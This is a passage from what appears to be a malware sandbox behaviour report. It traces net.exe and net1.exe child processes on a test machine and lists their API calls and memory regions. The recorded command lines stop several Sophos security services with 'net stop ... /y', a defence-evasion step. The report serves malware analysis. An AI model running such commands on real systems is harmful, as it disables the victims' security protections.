(nStdHandle=0xfffffff4) returned 0xb [0081.849] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Agent\" /y" [0081.849] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef650, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0081.849] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0081.850] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef8a8 | out: Buffer=0xef8a8*=0x1c4d50) returned 0x0 [0081.850] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef8a8 | out: Buffer=0xef8a8*=0x1cc100) returned 0x0 [0081.850] _fileno (_File=0x7fefdba2a80) returned 0 [0081.850] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0081.850] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0081.850] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0081.850] _wcsicmp (_String1="config", _String2="stop") returned -16 [0081.850] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0081.850] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0081.850] _wcsicmp (_String1="file", _String2="stop") returned -13 [0081.850] _wcsicmp (_String1="files", _String2="stop") returned -13 [0081.850] _wcsicmp (_String1="group", _String2="stop") returned -12 [0081.850] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0081.850] _wcsicmp (_String1="help", _String2="stop") returned -11 [0081.850] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0081.850] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0081.850] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0081.850] _wcsicmp (_String1="session", _String2="stop") returned -15 [0081.850] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0081.850] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0081.850] _wcsicmp (_String1="share", _String2="stop") returned -12 [0081.850] _wcsicmp (_String1="start", _String2="stop") returned -14 [0081.850] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0081.850] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0081.851] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0081.851] _wcsicmp (_String1="accounts", _String2="Sophos Agent") returned -18 [0081.851] _wcsicmp (_String1="computer", _String2="Sophos Agent") returned -16 [0081.851] _wcsicmp (_String1="config", _String2="Sophos Agent") returned -16 [0081.851] _wcsicmp (_String1="continue", _String2="Sophos Agent") returned -16 [0081.851] _wcsicmp (_String1="cont", _String2="Sophos Agent") returned -16 [0081.851] _wcsicmp (_String1="file", _String2="Sophos Agent") returned -13 [0081.851] _wcsicmp (_String1="files", _String2="Sophos Agent") returned -13 [0081.851] _wcsicmp (_String1="group", _String2="Sophos Agent") returned -12 [0081.851] _wcsicmp (_String1="groups", _String2="Sophos Agent") returned -12 [0081.851] _wcsicmp (_String1="help", _String2="Sophos Agent") returned -11 [0081.851] _wcsicmp (_String1="helpmsg", _String2="Sophos Agent") returned -11 [0081.851] _wcsicmp (_String1="localgroup", _String2="Sophos Agent") returned -7 [0081.851] _wcsicmp (_String1="pause", _String2="Sophos Agent") returned -3 [0081.851] _wcsicmp (_String1="session", _String2="Sophos Agent") returned -10 [0081.851] _wcsicmp (_String1="sessions", _String2="Sophos Agent") returned -10 [0081.851] _wcsicmp (_String1="sess", _String2="Sophos Agent") returned -10 [0081.851] _wcsicmp (_String1="share", _String2="Sophos Agent") returned -7 [0081.851] _wcsicmp (_String1="start", _String2="Sophos Agent") returned 5 [0081.851] _wcsicmp (_String1="stats", _String2="Sophos Agent") returned 5 [0081.851] _wcsicmp (_String1="statistics", _String2="Sophos Agent") returned 5 [0081.851] _wcsicmp (_String1="stop", _String2="Sophos Agent") returned 5 [0081.851] _wcsicmp (_String1="time", _String2="Sophos Agent") returned 1 [0081.851] _wcsicmp (_String1="user", _String2="Sophos Agent") returned 2 [0081.851] _wcsicmp (_String1="users", _String2="Sophos Agent") returned 2 [0081.851] _wcsicmp (_String1="msg", _String2="Sophos Agent") returned -6 [0081.851] _wcsicmp (_String1="messenger", _String2="Sophos Agent") returned -6 [0081.851] _wcsicmp (_String1="receiver", _String2="Sophos Agent") returned -1 [0081.851] _wcsicmp (_String1="rcv", _String2="Sophos Agent") returned -1 [0081.851] _wcsicmp (_String1="netpopup", _String2="Sophos Agent") returned -5 [0081.851] _wcsicmp (_String1="redirector", _String2="Sophos Agent") returned -1 [0081.851] _wcsicmp (_String1="redir", _String2="Sophos Agent") returned -1 [0081.852] _wcsicmp (_String1="rdr", _String2="Sophos Agent") returned -1 [0081.852] _wcsicmp (_String1="workstation", _String2="Sophos Agent") returned 4 [0081.852] _wcsicmp (_String1="work", _String2="Sophos Agent") returned 4 [0081.852] _wcsicmp (_String1="wksta", _String2="Sophos Agent") returned 4 [0081.852] _wcsicmp (_String1="prdr", _String2="Sophos Agent") returned -3 [0081.852] _wcsicmp (_String1="devrdr", _String2="Sophos Agent") returned -15 [0081.852] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos Agent") returned -7 [0081.852] _wcsicmp (_String1="server", _String2="Sophos Agent") returned -10 [0081.852] _wcsicmp (_String1="svr", _String2="Sophos Agent") returned 7 [0081.852] _wcsicmp (_String1="srv", _String2="Sophos Agent") returned 3 [0081.852] _wcsicmp (_String1="lanmanserver", _String2="Sophos Agent") returned -7 [0081.852] _wcsicmp (_String1="alerter", _String2="Sophos Agent") returned -18 [0081.852] _wcsicmp (_String1="netlogon", _String2="Sophos Agent") returned -5 [0081.852] _wcsupr (in: _String="Sophos Agent" | out: _String="SOPHOS AGENT") returned="SOPHOS AGENT" [0081.852] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1cce10 [0081.856] GetServiceKeyNameW (in: hSCManager=0x1cce10, lpDisplayName="SOPHOS AGENT", lpServiceName=0xffdc5750, lpcchBuffer=0xef7c8 | out: lpServiceName="", lpcchBuffer=0xef7c8) returned 0 [0081.857] _wcsicmp (_String1="msg", _String2="SOPHOS AGENT") returned -6 [0081.857] _wcsicmp (_String1="messenger", _String2="SOPHOS AGENT") returned -6 [0081.857] _wcsicmp (_String1="receiver", _String2="SOPHOS AGENT") returned -1 [0081.857] _wcsicmp (_String1="rcv", _String2="SOPHOS AGENT") returned -1 [0081.857] _wcsicmp (_String1="redirector", _String2="SOPHOS AGENT") returned -1 [0081.857] _wcsicmp (_String1="redir", _String2="SOPHOS AGENT") returned -1 [0081.857] _wcsicmp (_String1="rdr", _String2="SOPHOS AGENT") returned -1 [0081.857] _wcsicmp (_String1="workstation", _String2="SOPHOS AGENT") returned 4 [0081.857] _wcsicmp (_String1="work", _String2="SOPHOS AGENT") returned 4 [0081.857] _wcsicmp (_String1="wksta", _String2="SOPHOS AGENT") returned 4 [0081.857] _wcsicmp (_String1="prdr", _String2="SOPHOS AGENT") returned -3 [0081.857] _wcsicmp (_String1="devrdr", _String2="SOPHOS AGENT") returned -15 [0081.857] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS AGENT") returned -7 [0081.857] _wcsicmp (_String1="server", _String2="SOPHOS AGENT") returned -10 [0081.858] _wcsicmp (_String1="svr", _String2="SOPHOS AGENT") returned 7 [0081.858] _wcsicmp (_String1="srv", _String2="SOPHOS AGENT") returned 3 [0081.858] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS AGENT") returned -7 [0081.858] _wcsicmp (_String1="alerter", _String2="SOPHOS AGENT") returned -18 [0081.858] _wcsicmp (_String1="netlogon", _String2="SOPHOS AGENT") returned -5 [0081.858] NetServiceControl (in: servername=0x0, service="SOPHOS AGENT", opcode=0x0, arg=0x0, bufptr=0xef7d0 | out: bufptr=0xef7d0) returned 0x889 [0081.858] wcscpy_s (in: _Destination=0xffdc80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0081.858] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0081.859] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffdc5b50, nSize=0x800, Arguments=0xffdc7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0081.861] GetFileType (hFile=0xb) returned 0x2 [0081.862] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef698 | out: lpMode=0xef698) returned 1 [0081.862] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdc5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xef690, lpReserved=0x0 | out: lpBuffer=0xffdc5b50*, lpNumberOfCharsWritten=0xef690*=0x1e) returned 1 [0081.862] GetFileType (hFile=0xb) returned 0x2 [0081.862] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef698 | out: lpMode=0xef698) returned 1 [0081.863] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef690, lpReserved=0x0 | out: lpBuffer=0xffda1efc*, lpNumberOfCharsWritten=0xef690*=0x2) returned 1 [0081.863] _ultow (in: _Dest=0x889, _Radix=980736 | out: _Dest=0x889) returned="2185" [0081.863] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffdc5b50, nSize=0x800, Arguments=0xffdc7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0081.863] GetFileType (hFile=0xb) returned 0x2 [0081.863] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef698 | out: lpMode=0xef698) returned 1 [0081.863] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdc5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xef690, lpReserved=0x0 | out: lpBuffer=0xffdc5b50*, lpNumberOfCharsWritten=0xef690*=0x34) returned 1 [0081.864] GetFileType (hFile=0xb) returned 0x2 [0081.864] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef698 | out: lpMode=0xef698) returned 1 [0081.864] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef690, lpReserved=0x0 | out: lpBuffer=0xffda1efc*, lpNumberOfCharsWritten=0xef690*=0x2) returned 1 [0081.864] NetApiBufferFree (Buffer=0x1c4d50) returned 0x0 [0081.864] NetApiBufferFree (Buffer=0x1cc100) returned 0x0 [0081.864] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Agent\" /y" [0081.864] exit (_Code=2) Process: id = "56" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x25535000" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos Device Control Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3857 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3858 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3859 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3860 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3861 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3862 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3863 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3864 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3865 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3866 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3867 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3868 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3869 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3870 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3871 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4083 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4084 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4085 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4086 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4087 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 4088 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4089 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4090 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4091 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 4092 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4093 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4094 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4095 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4096 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4097 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4098 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4099 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4100 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4101 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4102 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 386 os_tid = 0x934 Process: id = "57" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x24954000" os_pid = "0xc8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos File Scanner Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3874 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3875 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3876 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3877 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3878 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3879 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3880 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3881 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3882 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3883 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3884 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3885 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3886 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3887 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3888 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 388 os_tid = 0xc9c Process: id = "58" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x24398000" os_pid = "0xd00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0xfac" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos AutoUpdate Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3889 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3890 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3891 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3892 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3893 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3894 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3895 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3896 start_va = 0xffdd0000 end_va = 0xffe02fff entry_point = 0xffdd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 3897 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3898 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3899 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3900 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3901 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3902 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3903 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3919 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3920 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3921 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3922 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3923 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3924 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3925 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3926 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3927 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3928 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3929 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3930 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3931 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3932 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3933 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3934 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3935 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3936 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3937 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3938 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = 